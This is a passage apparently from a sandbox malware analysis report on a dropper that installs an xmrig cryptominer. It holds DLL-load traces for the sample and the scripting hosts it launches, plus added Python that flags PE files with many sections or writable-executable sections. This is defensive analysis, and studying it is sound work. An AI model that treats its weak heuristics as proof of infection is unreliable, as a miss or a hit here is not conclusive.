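On a live host, feed the whole report into parse_report_lines and point hunt_hashes at C:\ProgramData and the user profile; a hash hit is strong evidence of this exact build, but a miss is not exoneration, since rebuilt or repacked xmrig and driver copies hash differently while keeping the same paths, so check the paths and the kernel driver load independently.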
Source: C:\Users\user\AppData\Roaming\1.exe Code function: String function: 00007FF7033DCDC8 appears 35 times
Source: C:\Users\user\AppData\Roaming\1.exe Code function: String function: 00007FF7033DA384 appears 169 times
Source: C:\Users\user\AppData\Roaming\1.exe Code function: String function: 00007FF70338DFF4 appears 35 times
Source: C:\Users\user\AppData\Roaming\1.exe Code function: String function: 00007FF7033FBA1E appears 52 times
Source: C:\Users\user\AppData\Roaming\1.exe Code function: String function: 00007FF7033DA450 appears 166 times
Source: C:\Users\user\AppData\Roaming\1.exe Code function: String function: 00007FF7033DCE1C appears 83 times
Source: C:\Users\user\AppData\Roaming\1.exe Code function: String function: 00007FF7033FB9FA appears 41 times
Source: xmrig.exe.6.dr Static PE information: Number of sections : 11 > 10
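The line above is a static heuristic: a PE with more than ten sections is unusual enough to note. As an added example (not part of the report and not Joe Sandbox's code), the following Python reads the COFF file header and section table directly to reproduce that count, and adds a second check the report does not apply, flagging any section mapped both writable and executable, which is typical of packer stubs that unpack in place. build_constructed_pe assembles a minimal header for testing; it is not a real sample and does not run. The ten-section threshold and the section list used in demo() are assumptions chosen to mirror the report's rule.

```python
import struct

IMAGE_SCN_MEM_EXECUTE = 0x20000000
IMAGE_SCN_MEM_READ = 0x40000000
IMAGE_SCN_MEM_WRITE = 0x80000000
SECTION_COUNT_THRESHOLD = 10  # the report's rule: "Number of sections : 11 > 10"


def parse_pe_sections(data: bytes):
    """Return (NumberOfSections, [(name, characteristics), ...]) from a PE image.

    Only e_lfanew, the 20-byte COFF file header and the section table are read;
    the optional header is skipped using SizeOfOptionalHeader.
    """
    if len(data) < 0x40 or data[:2] != b"MZ":
        raise ValueError("not an MZ executable")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("PE signature not found at e_lfanew")
    coff = e_lfanew + 4
    _machine, nsections, _ts, _symptr, _nsyms, opt_size, _chars = struct.unpack_from("<HHIIIHH", data, coff)
    table = coff + 20 + opt_size
    sections = []
    for i in range(nsections):
        off = table + i * 40  # IMAGE_SECTION_HEADER is 40 bytes
        if off + 40 > len(data):
            raise ValueError("section table truncated")
        name = data[off:off + 8].rstrip(b"\0").decode("ascii", "replace")
        characteristics = struct.unpack_from("<I", data, off + 36)[0]
        sections.append((name, characteristics))
    return nsections, sections


def assess_sections(data: bytes):
    """Apply the section-count rule and a W+X rule; return the findings (empty list = nothing flagged)."""
    nsections, sections = parse_pe_sections(data)
    findings = []
    if nsections > SECTION_COUNT_THRESHOLD:
        findings.append(f"Number of sections : {nsections} > {SECTION_COUNT_THRESHOLD}")
    for name, chars in sections:
        if chars & IMAGE_SCN_MEM_WRITE and chars & IMAGE_SCN_MEM_EXECUTE:
            findings.append(f"section {name!r} is writable and executable")
    return findings


def build_constructed_pe(sections, opt_size=240):
    """Build a minimal PE header (constructed test input, not a runnable image)."""
    e_lfanew = 0x40
    dos = b"MZ" + b"\0" * (0x3C - 2) + struct.pack("<I", e_lfanew)
    coff = struct.pack("<HHIIIHH", 0x8664, len(sections), 0, 0, 0, opt_size, 0x22)
    table = b"".join(
        name.encode("ascii").ljust(8, b"\0") + b"\0" * 28 + struct.pack("<I", chars)
        for name, chars in sections
    )
    return dos + b"PE\0\0" + coff + b"\0" * opt_size + table


RX = IMAGE_SCN_MEM_READ | IMAGE_SCN_MEM_EXECUTE
RW = IMAGE_SCN_MEM_READ | IMAGE_SCN_MEM_WRITE


def demo():
    """Eleven sections with one W+X stub versus a four-section layout."""
    many = [(".text", RX), (".rdata", IMAGE_SCN_MEM_READ), (".data", RW), (".pdata", IMAGE_SCN_MEM_READ),
            (".rsrc", IMAGE_SCN_MEM_READ), (".reloc", IMAGE_SCN_MEM_READ), (".tls", RW), (".CRT", RW),
            (".idata", RW), (".bss", RW), ("UPX1", RX | IMAGE_SCN_MEM_WRITE)]
    few = many[:4]
    return assess_sections(build_constructed_pe(many)), assess_sections(build_constructed_pe(few))


if __name__ == "__main__":
    print(demo())
```

The count rule is weak on its own: large statically linked builds, xmrig among them, routinely exceed ten sections without being packed, so treat it as a triage prompt to be confirmed by the W+X check, entropy, or the dropped-file hash rather than as a verdict.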
Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Heur.Jatommy.03108.aaW@baaaa.28486.12528.exe Section loaded: version.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Heur.Jatommy.03108.aaW@baaaa.28486.12528.exe Section loaded: dxgidebug.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Heur.Jatommy.03108.aaW@baaaa.28486.12528.exe Section loaded: sfc_os.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Heur.Jatommy.03108.aaW@baaaa.28486.12528.exe Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Heur.Jatommy.03108.aaW@baaaa.28486.12528.exe Section loaded: rsaenh.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Heur.Jatommy.03108.aaW@baaaa.28486.12528.exe Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Heur.Jatommy.03108.aaW@baaaa.28486.12528.exe Section loaded: dwmapi.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Heur.Jatommy.03108.aaW@baaaa.28486.12528.exe Section loaded: cryptbase.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Heur.Jatommy.03108.aaW@baaaa.28486.12528.exe Section loaded: riched20.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Heur.Jatommy.03108.aaW@baaaa.28486.12528.exe Section loaded: usp10.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Heur.Jatommy.03108.aaW@baaaa.28486.12528.exe Section loaded: msls31.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Heur.Jatommy.03108.aaW@baaaa.28486.12528.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Heur.Jatommy.03108.aaW@baaaa.28486.12528.exe Section loaded: windowscodecs.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Heur.Jatommy.03108.aaW@baaaa.28486.12528.exe Section loaded: textshaping.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Heur.Jatommy.03108.aaW@baaaa.28486.12528.exe Section loaded: textinputframework.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Heur.Jatommy.03108.aaW@baaaa.28486.12528.exe Section loaded: coreuicomponents.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Heur.Jatommy.03108.aaW@baaaa.28486.12528.exe Section loaded: coremessaging.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Heur.Jatommy.03108.aaW@baaaa.28486.12528.exe Section loaded: ntmarta.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Heur.Jatommy.03108.aaW@baaaa.28486.12528.exe Section loaded: coremessaging.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Heur.Jatommy.03108.aaW@baaaa.28486.12528.exe Section loaded: wintypes.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Heur.Jatommy.03108.aaW@baaaa.28486.12528.exe Section loaded: wintypes.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Heur.Jatommy.03108.aaW@baaaa.28486.12528.exe Section loaded: wintypes.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Heur.Jatommy.03108.aaW@baaaa.28486.12528.exe Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Heur.Jatommy.03108.aaW@baaaa.28486.12528.exe Section loaded: wldp.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Heur.Jatommy.03108.aaW@baaaa.28486.12528.exe Section loaded: propsys.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Heur.Jatommy.03108.aaW@baaaa.28486.12528.exe Section loaded: profapi.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Heur.Jatommy.03108.aaW@baaaa.28486.12528.exe Section loaded: edputil.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Heur.Jatommy.03108.aaW@baaaa.28486.12528.exe Section loaded: urlmon.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Heur.Jatommy.03108.aaW@baaaa.28486.12528.exe Section loaded: iertutil.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Heur.Jatommy.03108.aaW@baaaa.28486.12528.exe Section loaded: srvcli.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Heur.Jatommy.03108.aaW@baaaa.28486.12528.exe Section loaded: netutils.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Heur.Jatommy.03108.aaW@baaaa.28486.12528.exe Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Heur.Jatommy.03108.aaW@baaaa.28486.12528.exe Section loaded: policymanager.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Heur.Jatommy.03108.aaW@baaaa.28486.12528.exe Section loaded: msvcp110_win.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Heur.Jatommy.03108.aaW@baaaa.28486.12528.exe Section loaded: appresolver.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Heur.Jatommy.03108.aaW@baaaa.28486.12528.exe Section loaded: bcp47langs.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Heur.Jatommy.03108.aaW@baaaa.28486.12528.exe Section loaded: slc.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Heur.Jatommy.03108.aaW@baaaa.28486.12528.exe Section loaded: sppc.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Heur.Jatommy.03108.aaW@baaaa.28486.12528.exe Section loaded: userenv.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Heur.Jatommy.03108.aaW@baaaa.28486.12528.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Heur.Jatommy.03108.aaW@baaaa.28486.12528.exe Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Heur.Jatommy.03108.aaW@baaaa.28486.12528.exe Section loaded: pcacli.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Heur.Jatommy.03108.aaW@baaaa.28486.12528.exe Section loaded: mpr.dll
Source: C:\Windows\System32\wscript.exe Section loaded: version.dll
Source: C:\Windows\System32\wscript.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wscript.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\wscript.exe Section loaded: sxs.dll
Source: C:\Windows\System32\wscript.exe Section loaded: vbscript.dll
Source: C:\Windows\System32\wscript.exe Section loaded: amsi.dll
Source: C:\Windows\System32\wscript.exe Section loaded: userenv.dll
Source: C:\Windows\System32\wscript.exe Section loaded: profapi.dll
Source: C:\Windows\System32\wscript.exe Section loaded: wldp.dll
Source: C:\Windows\System32\wscript.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\wscript.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\wscript.exe Section loaded: rsaenh.dll
Source: C:\Windows\System32\wscript.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\wscript.exe Section loaded: msisip.dll
Source: C:\Windows\System32\wscript.exe Section loaded: wshext.dll
Source: C:\Windows\System32\wscript.exe Section loaded: scrobj.dll
Source: C:\Windows\System32\wscript.exe Section loaded: mpr.dll
Source: C:\Windows\System32\wscript.exe Section loaded: scrrun.dll
Source: C:\Windows\System32\wscript.exe Section loaded: windows.storage.dll
Source: C:\Windows\System32\wscript.exe Section loaded: propsys.dll
Source: C:\Windows\System32\wscript.exe Section loaded: edputil.dll
Source: C:\Windows\System32\wscript.exe Section loaded: urlmon.dll
Source: C:\Windows\System32\wscript.exe Section loaded: iertutil.dll
Source: C:\Windows\System32\wscript.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\wscript.exe Section loaded: netutils.dll
Source: C:\Windows\System32\wscript.exe Section loaded: windows.staterepositoryps.dll
Source: C:\Windows\System32\wscript.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\wscript.exe Section loaded: wintypes.dll
Source: C:\Windows\System32\wscript.exe Section loaded: appresolver.dll
Source: C:\Windows\System32\wscript.exe Section loaded: bcp47langs.dll
Source: C:\Windows\System32\wscript.exe Section loaded: slc.dll
Source: C:\Windows\System32\wscript.exe Section loaded: sppc.dll
Source: C:\Windows\System32\wscript.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\System32\wscript.exe Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\System32\cmd.exe Section loaded: cmdext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iphlpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dnsapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dhcpcsvc6.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dhcpcsvc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: winnsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasapi32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasman.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rtutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mswsock.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: winhttp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasadhlp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Roaming\6.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\6.exe Section loaded: dxgidebug.dll
Source: C:\Users\user\AppData\Roaming\6.exe Section loaded: sfc_os.dll
Source: C:\Users\user\AppData\Roaming\6.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Roaming\6.exe Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Roaming\6.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Roaming\6.exe Section loaded: dwmapi.dll
Source: C:\Users\user\AppData\Roaming\6.exe Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Roaming\6.exe Section loaded: riched20.dll
Source: C:\Users\user\AppData\Roaming\6.exe Section loaded: usp10.dll
Source: C:\Users\user\AppData\Roaming\6.exe Section loaded: msls31.dll
Source: C:\Users\user\AppData\Roaming\6.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\6.exe Section loaded: windowscodecs.dll
Source: C:\Users\user\AppData\Roaming\6.exe Section loaded: textshaping.dll
Source: C:\Users\user\AppData\Roaming\6.exe Section loaded: textinputframework.dll
Source: C:\Users\user\AppData\Roaming\6.exe Section loaded: coreuicomponents.dll
Source: C:\Users\user\AppData\Roaming\6.exe Section loaded: coremessaging.dll
Source: C:\Users\user\AppData\Roaming\6.exe Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\Roaming\6.exe Section loaded: coremessaging.dll
Source: C:\Users\user\AppData\Roaming\6.exe Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Roaming\6.exe Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Roaming\6.exe Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Roaming\6.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Roaming\6.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Roaming\6.exe Section loaded: propsys.dll
Source: C:\Users\user\AppData\Roaming\6.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Roaming\6.exe Section loaded: linkinfo.dll
Source: C:\Users\user\AppData\Roaming\6.exe Section loaded: ntshrui.dll
Source: C:\Users\user\AppData\Roaming\6.exe Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Roaming\6.exe Section loaded: cscapi.dll
Source: C:\Users\user\AppData\Roaming\6.exe Section loaded: edputil.dll
Source: C:\Users\user\AppData\Roaming\6.exe Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Roaming\6.exe Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Roaming\6.exe Section loaded: netutils.dll
Source: C:\Users\user\AppData\Roaming\6.exe Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\AppData\Roaming\6.exe Section loaded: policymanager.dll
Source: C:\Users\user\AppData\Roaming\6.exe Section loaded: msvcp110_win.dll
Source: C:\Users\user\AppData\Roaming\6.exe Section loaded: appresolver.dll
Source: C:\Users\user\AppData\Roaming\6.exe Section loaded: bcp47langs.dll
Source: C:\Users\user\AppData\Roaming\6.exe Section loaded: slc.dll
Source: C:\Users\user\AppData\Roaming\6.exe Section loaded: userenv.dll
Source: C:\Users\user\AppData\Roaming\6.exe Section loaded: sppc.dll
Source: C:\Users\user\AppData\Roaming\6.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\AppData\Roaming\6.exe Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\AppData\Roaming\6.exe Section loaded: pcacli.dll
Source: C:\Users\user\AppData\Roaming\6.exe Section loaded: mpr.dll
Source: C:\Windows\System32\wscript.exe Section loaded: version.dll
Source: C:\Windows\System32\wscript.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wscript.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\wscript.exe Section loaded: sxs.dll
Source: C:\Windows\System32\wscript.exe Section loaded: vbscript.dll
Source: C:\Windows\System32\wscript.exe Section loaded: amsi.dll
Source: C:\Windows\System32\wscript.exe Section loaded: userenv.dll
Source: C:\Windows\System32\wscript.exe Section loaded: profapi.dll
Source: C:\Windows\System32\wscript.exe Section loaded: wldp.dll
Source: C:\Windows\System32\wscript.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\wscript.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\wscript.exe Section loaded: rsaenh.dll
Source: C:\Windows\System32\wscript.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\wscript.exe Section loaded: msisip.dll
Source: C:\Windows\System32\wscript.exe Section loaded: wshext.dll
Source: C:\Windows\System32\wscript.exe Section loaded: scrobj.dll
Source: C:\Windows\System32\wscript.exe Section loaded: mpr.dll
Source: C:\Windows\System32\wscript.exe Section loaded: scrrun.dll
Source: C:\Windows\System32\wscript.exe Section loaded: windows.storage.dll
Source: C:\Windows\System32\wscript.exe Section loaded: propsys.dll
Source: C:\Windows\System32\wscript.exe Section loaded: edputil.dll
Source: C:\Windows\System32\wscript.exe Section loaded: urlmon.dll
Source: C:\Windows\System32\wscript.exe Section loaded: iertutil.dll
Source: C:\Windows\System32\wscript.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\wscript.exe Section loaded: netutils.dll
Source: C:\Windows\System32\wscript.exe Section loaded: windows.staterepositoryps.dll
Source: C:\Windows\System32\wscript.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\wscript.exe Section loaded: wintypes.dll
Source: C:\Windows\System32\wscript.exe Section loaded: appresolver.dll
Source: C:\Windows\System32\wscript.exe Section loaded: bcp47langs.dll
Source: C:\Windows\System32\wscript.exe Section loaded: slc.dll
Source: C:\Windows\System32\wscript.exe Section loaded: sppc.dll
Source: C:\Windows\System32\wscript.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\System32\wscript.exe Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\System32\cmd.exe Section loaded: cmdext.dll
Source: C:\Windows\System32\cmd.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\cmd.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\cmd.exe Section loaded: windows.storage.dll
Source: C:\Windows\System32\cmd.exe Section loaded: wldp.dll
Source: C:\Windows\System32\cmd.exe Section loaded: propsys.dll
Source: C:\Windows\System32\cmd.exe Section loaded: profapi.dll
Source: C:\Windows\System32\cmd.exe Section loaded: edputil.dll
Source: C:\Windows\System32\cmd.exe Section loaded: urlmon.dll
Source: C:\Windows\System32\cmd.exe Section loaded: iertutil.dll
Source: C:\Windows\System32\cmd.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\cmd.exe Section loaded: netutils.dll
Source: C:\Windows\System32\cmd.exe Section loaded: windows.staterepositoryps.dll
Source: C:\Windows\System32\cmd.exe Section loaded: policymanager.dll
Source: C:\Windows\System32\cmd.exe Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\cmd.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\cmd.exe Section loaded: wintypes.dll
Source: C:\Windows\System32\cmd.exe Section loaded: appresolver.dll
Source: C:\Windows\System32\cmd.exe Section loaded: bcp47langs.dll
Source: C:\Windows\System32\cmd.exe Section loaded: slc.dll
Source: C:\Windows\System32\cmd.exe Section loaded: userenv.dll
Source: C:\Windows\System32\cmd.exe Section loaded: sppc.dll
Source: C:\Windows\System32\cmd.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\System32\cmd.exe Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\System32\cmd.exe Section loaded: pcacli.dll
Source: C:\Windows\System32\cmd.exe Section loaded: mpr.dll
Source: C:\Windows\System32\cmd.exe Section loaded: sfc_os.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: version.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: mpr.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: framedynos.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: dbghelp.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: netutils.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: wbemcomn.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: winsta.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: amsi.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: userenv.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: profapi.dll
Source: C:\Windows\System32\find.exe Section loaded: ulib.dll
Source: C:\Windows\System32\find.exe Section loaded: fsutilext.dll
Source: C:\Windows\System32\timeout.exe Section loaded: version.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: version.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: mpr.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: framedynos.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: dbghelp.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: netutils.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: wbemcomn.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: winsta.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: amsi.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: userenv.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iphlpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dnsapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dhcpcsvc6.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dhcpcsvc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: winnsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasapi32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasman.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rtutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mswsock.dll
